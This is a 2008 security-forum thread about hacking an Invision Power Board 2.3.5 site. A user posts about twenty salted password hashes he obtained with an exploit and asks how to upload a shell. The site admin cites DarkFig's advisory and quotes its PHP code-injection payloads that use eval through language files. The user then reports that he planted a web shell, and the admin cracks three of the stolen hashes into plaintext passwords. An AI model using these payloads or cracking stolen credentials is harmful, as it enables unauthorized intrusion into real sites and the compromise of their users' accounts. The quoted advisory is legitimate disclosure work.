Waraxe IT Security Portal
Login or Register
July 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 216
Members: 0
Total: 216
Full disclosure
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
SEC Consult SA-20240620-0 :: Arbitrary File Upload in edu-sharing (metaVentis GmbH)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other hashes -> some questions on ipb
Post new topicReply to topic View previous topic :: View next topic
some questions on ipb
PostPosted: Tue Sep 23, 2008 4:59 pm Reply with quote
king424
Regular user
Regular user
Joined: Apr 03, 2008
Posts: 24




first:i use ipb2.3.5 exp got some hash,but cann't crack them~
Hash: 4d86409a2fd8dffc4e60c915f83fde77 Salt: c~cfN
Hash: 5a76d0a32d9e713d3f86fef9de08ed10 Salt: 2bzLS
Hash: 6611271cb4fef84dee04fac706bba8bf Salt: G?dvO
Hash: 2482566d9798bd8b66fb7d6ca343e0d1 Salt: ;"u??
Hash: 6afebdbc3da0e5fe025c8c80190d6acf Salt: ]}5td
Hash: b5aa5095177b1fe1d7aba35ddf7c238e Salt: $QmZ;
Hash: 4d1c98ad4b31e1518d0c9036d1922b41 Salt: |3|uE
Hash: 8813d3647b5e23815d80f659ce9a1886 Salt: YgiMC
Hash: 69d047edafb621fc1024366a39a26f01 Salt: &tg0~
Hash: f3df6fde904cfd2905099dba3dfb5a33 Salt: .Qpc}
Hash: 3389e60cf59abffec47f28f42d87d7cd Salt: lq30x
Hash: 06e5fdb9d0b1378cc5b863d3abcb29be Salt: L/(1V
Hash: 0c0a9aba4d194b3b3ddd6458673b7bbe Salt: hM!v%
Hash: 0554c34fc91fd76785e2713f7cfa22c1 Salt: +`{+u
Hash: ea2c88dc1dd3ad67738e72c90677a1c9 Salt: D{|a?
Hash: 6c8bc609808a88090bb90d7e5ea07620 Salt: hA80]
Hash: f5523704af4d3a00c2d7fe59cdc345be Salt: Rv/3W
Hash: 25ffb0cc85ac580f59112fe3ef76ec31 Salt: v|{|=
Hash: e42bde777cffec3766c4e387cd69406b Salt: PkyRo
Hash: 44352b5a1741ec1c382f0aa77f7cdb8e Salt: 8f+n)
Hash: 9a5cc5f20a4d7a61ec25c83e7fa827a5 Salt: meshI
Hash: f2b932b4f7550f3d4ad527abb7ab43b6 Salt: AAo.)

The second:ipb2.3.5 how to upload shell?

thanks for you help!
View user's profile Send private message
PostPosted: Tue Sep 23, 2008 8:45 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory Smile

http://acid-root.new.fr/?0:18
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Sep 24, 2008 6:05 am Reply with quote
king424
Regular user
Regular user
Joined: Apr 03, 2008
Posts: 24




waraxe wrote:
Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory Smile

http://acid-root.new.fr/?0:18


thanks for waraxe.i upload shell Successfull~~
Very Happy
but these hash cracked failure Rolling Eyes
View user's profile Send private message
PostPosted: Wed Sep 24, 2008 7:55 am Reply with quote
martin1
Regular user
Regular user
Joined: Sep 21, 2008
Posts: 17




any chance one of you's can gimme some advice with this. As the link you supplied dont work Confused
View user's profile Send private message
PostPosted: Wed Sep 24, 2008 8:53 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




martin1 wrote:
any chance one of you's can gimme some advice with this. As the link you supplied dont work Confused


http://acid-root.new.fr/?0:18

Code:


Title: Invision Power Board <= 2.3.5
Multiple Vulnerabilities and Security Bypass

Vendor: http://www.invisionpower.com/community/board/

Advisory: http://acid-root.new.fr/?0:18
Author: DarkFig < gmdarkfig (at) gmail (dot) com >

Released on: 2008/08/29
Changelog: 2008/08/30

Summary: Introduction
Blind SQL Injection
Insecure SQL Password Usage
Admin Session Hijacking
Deep Recursion Protection Bypass
Code Execution
Miscellanious

Risk level: Medium / High


...
...

VI - CODE EXECUTION

The ACP allows admins to manage languages, they can
choose the default language, import a new one, and edit
them. Let's take a look in the file "sources/action_admin/
languages.php":

65| switch($this->ipsclass->input['code'])
66| {
..|
88| case 'doedit':
89| $this->ipsclass->admin->cp_permission_check(...);
90| $this->save_langfile();
110| break;
...|
935| function save_langfile()
936| {
...|
957| $lang_file = CACHE_PATH."cache/lang_cache/".$row['ldir'].
...| "/".$this->ipsclass->input['lang_file'];
958|
959| if (! file_exists( $lang_file ) ) ...
...|
963|
964| if (! is_writeable( $lang_file ) ) ...
...|
969| $barney = array();
970|
971| foreach ($this->ipsclass->input as $k => $v)
972| {
973| if ( preg_match( "/^XX_(\S+)$/", $k, $match ) )
974| {
975| if ( isset($this->ipsclass->input[ $match[0] ]) )
976| {
977| $v = str_replace("'", "'", stripslashes($_POST[$match[0]]));
978| $v = str_replace("<", "<", $v );
979| $v = str_replace(">", ">", $v );
980| $v = str_replace("&", "&", $v );
981| $v = str_replace("\r", "", $v );
982|
983| $barney[ $match[1] ] = $v;
984| }
985| }
986| }

As you can see, there's several replacements which are
made. Some HTML entities are converted to their applicable
characters. The "stripslashes()" function is also called.
But we don't really care about that, this will not cause
a problem, this was just to show you how user's inputs
are treated. Now let's see how the change is made:

993| $start = "<?php\n\n".'$lang = array('."\n";
994|
995| foreach($barney as $key => $text)
996| {
997| $text = preg_replace("/\n{1,}$/", "", $text);
998| $start .= "\n'".$key."' => \"".str_replace( '"', '\"', $text)."\",";
999| }
1000|
1001| $start .= "\n\n);\n\n?".">";
1002|
1003| if ($fh = fopen( $lang_file, 'w') )
1004| {
1005| fwrite($fh, $start );
1006| fclose($fh);
1007| }

So, there's a protection against double quotes, not all
escape characters. There are several ways to bypass this
protection.

The first method, is to play with what we call "dynamic
variables". With two $, we can execute PHP code.
Example: ${${@eval($_SERVER[HTTP_SH])}}

The second one, is to use another escape character, a
backslash (\) will do the stuff. The attacker must change
two inputs. Example:

First input: hello\
Second input: ); @eval($_SERVER[HTTP_SH]); /*

View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Sep 24, 2008 10:23 am Reply with quote
martin1
Regular user
Regular user
Joined: Sep 21, 2008
Posts: 17




Thanks waraxe Wink
View user's profile Send private message
PostPosted: Wed Sep 24, 2008 12:32 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Plaintext of 4d1c98ad4b31e1518d0c9036d1922b41 is forever
Plaintext of 44352b5a1741ec1c382f0aa77f7cdb8e is mugello
Plaintext of 06e5fdb9d0b1378cc5b863d3abcb29be is brabak


Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Sep 25, 2008 5:36 am Reply with quote
king424
Regular user
Regular user
Joined: Apr 03, 2008
Posts: 24




thanks again! Laughing
anyone can crack any others?
View user's profile Send private message
PostPosted: Fri Sep 26, 2008 7:08 am Reply with quote
donkey
Regular user
Regular user
Joined: Sep 26, 2008
Posts: 11




how did u get the salt of that thing ?
View user's profile Send private message
some questions on ipb
www.waraxe.us Forum Index -> All other hashes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.093 Seconds